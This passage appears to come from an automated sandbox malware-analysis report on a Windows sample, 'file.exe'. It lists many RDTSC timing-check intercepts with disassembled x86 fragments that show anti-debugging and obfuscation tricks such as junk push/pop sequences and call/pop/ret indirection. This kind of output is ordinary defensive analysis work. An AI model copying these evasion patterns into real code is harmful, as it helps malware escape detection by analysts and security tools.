                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91EF9 second address: A91F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D571h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A910C2 second address: A910C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93103 second address: A9310D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF8E3D56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920BA second address: A920C4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920C4 second address: A9219A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F0BF8E3D578h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F0BF8E3D568h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov dword ptr [ebp+122D1EF0h], ebx 0x0000003f mov eax, dword ptr [ebp+122D08EDh] 0x00000045 call 00007F0BF8E3D56Bh 0x0000004a call 00007F0BF8E3D56Dh 0x0000004f mov bx, si 0x00000052 pop ebx 0x00000053 pop ebx 0x00000054 mov di, bx 0x00000057 push FFFFFFFFh 0x00000059 jmp 00007F0BF8E3D572h 0x0000005e xor dword ptr [ebp+1244008Fh], edi 0x00000064 nop 0x00000065 jc 00007F0BF8E3D56Eh 0x0000006b push edx 0x0000006c jp 00007F0BF8E3D566h 0x00000072 pop edx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jmp 00007F0BF8E3D576h 0x0000007c jc 00007F0BF8E3D566h 0x00000082 popad 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9219A second address: A9219F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9512E second address: A95133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95133 second address: A95151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95151 second address: A95157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9566D second address: A95677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95677 second address: A95722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0BF8E3D568h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sbb ebx, 0B284F68h 0x0000002a push 00000000h 0x0000002c jng 00007F0BF8E3D56Ch 0x00000032 ja 00007F0BF8E3D566h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F0BF8E3D568h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 jmp 00007F0BF8E3D56Bh 0x00000059 push eax 0x0000005a pop ebx 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0BF8E3D573h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F0BF8E3D575h 0x0000006a jmp 00007F0BF8E3D571h 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966A4 second address: A966BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145133h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966BF second address: A966C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A966C3 second address: A96702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F0BF9145128h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, 2D92h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b pop edi 0x0000002c xchg eax, esi 0x0000002d je 00007F0BF9145130h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96702 second address: A96727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0BF8E3D574h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F0BF8E3D566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A987DD second address: A987E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B944 second address: A9B94E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A7D9 second address: A9A7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A7DD second address: A9A7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FDEF second address: A9FE03 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F0BF9145126h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FE03 second address: A9FE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6303 second address: AA6309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6309 second address: AA631D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D570h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C29 second address: AA5C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BF914512Dh 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F0BF9145138h 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F0BF9145126h 0x0000001e jc 00007F0BF9145126h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C68 second address: AA5C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C6E second address: AA5C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF9145139h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C8B second address: AA5C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5DFD second address: AA5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5E03 second address: AA5E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0BF8E3D566h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA1BE second address: AAA1C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA316 second address: AAA32D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0BF8E3D56Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA32D second address: AAA33D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA33D second address: AAA392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0BF8E3D575h 0x0000000b jmp 00007F0BF8E3D571h 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jnc 00007F0BF8E3D56Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0BF8E3D576h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA392 second address: AAA3BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0BF9145138h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA3BA second address: AAA3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1318 second address: AB131C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB131C second address: AB136A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D571h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0BF8E3D578h 0x00000011 jmp 00007F0BF8E3D572h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0BF8E3D56Ch 0x0000001e jmp 00007F0BF8E3D56Ah 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC5F second address: A3FC9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145139h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0BF914512Dh 0x00000012 jmp 00007F0BF914512Eh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0741 second address: AB0765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0BF8E3D57Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0765 second address: AB076B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB076B second address: AB0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D574h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1170 second address: AB1187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145133h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81095 second address: A81099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81099 second address: A810AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF914512Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810AF second address: A810B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A810B3 second address: A8110F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0BF9145128h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12472E37h] 0x00000028 mov dword ptr [ebp+122D2D9Ch], edi 0x0000002e pushad 0x0000002f mov ax, 4B58h 0x00000033 movzx edx, ax 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007F0BF9145130h 0x0000003d push eax 0x0000003e jo 00007F0BF914512Eh 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8110F second address: A6AC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov dx, 73D4h 0x0000000a pushad 0x0000000b jns 00007F0BF8E3D566h 0x00000011 movzx edi, si 0x00000014 popad 0x00000015 call dword ptr [ebp+122D19A2h] 0x0000001b pushad 0x0000001c jmp 00007F0BF8E3D576h 0x00000021 push edx 0x00000022 jl 00007F0BF8E3D566h 0x00000028 jmp 00007F0BF8E3D576h 0x0000002d pop edx 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 jno 00007F0BF8E3D589h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81217 second address: A81226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8159A second address: A815A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81710 second address: A8171A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8171A second address: A81782 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF8E3D568h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 24C0C013h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0BF8E3D568h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3363h], edx 0x00000033 mov dword ptr [ebp+122D233Bh], ecx 0x00000039 call 00007F0BF8E3D569h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0BF8E3D579h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A818D5 second address: A818E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0BF9145126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A818E2 second address: A81962 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F0BF8E3D574h 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F0BF8E3D568h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d call 00007F0BF8E3D571h 0x00000032 mov dword ptr [ebp+122D1D2Ah], esi 0x00000038 pop ecx 0x00000039 jmp 00007F0BF8E3D572h 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 jmp 00007F0BF8E3D56Ch 0x00000047 pop ebx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FBA second address: A81FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FBE second address: A81FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F0BF8E3D566h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FD7 second address: A81FF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145137h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FF9 second address: A81FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81FFE second address: A82004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822BD second address: A82301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, 68639F52h 0x00000014 lea eax, dword ptr [ebp+12472E37h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F0BF8E3D568h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov edx, esi 0x00000036 nop 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82301 second address: A82305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82305 second address: A82332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BF8E3D56Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CB7 second address: AB4CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F55 second address: AB4F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F5B second address: AB4F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0BF914512Eh 0x0000000e jmp 00007F0BF914512Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F7F second address: AB4F9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0BF8E3D578h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F9C second address: AB4FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB513D second address: AB5146 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5146 second address: AB514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB514C second address: AB5152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5152 second address: AB5174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0BF9145138h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5174 second address: AB517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB517A second address: AB5180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB52F3 second address: AB52F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB52F9 second address: AB5305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0BF9145126h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5492 second address: AB5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5496 second address: AB549C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB549C second address: AB54AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F0BF8E3D566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB54AA second address: AB54AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB57D2 second address: AB57D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA51E second address: ABA523 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA69A second address: ABA6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA6A6 second address: ABA6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BF9145126h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c push esi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA88 second address: ABAA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
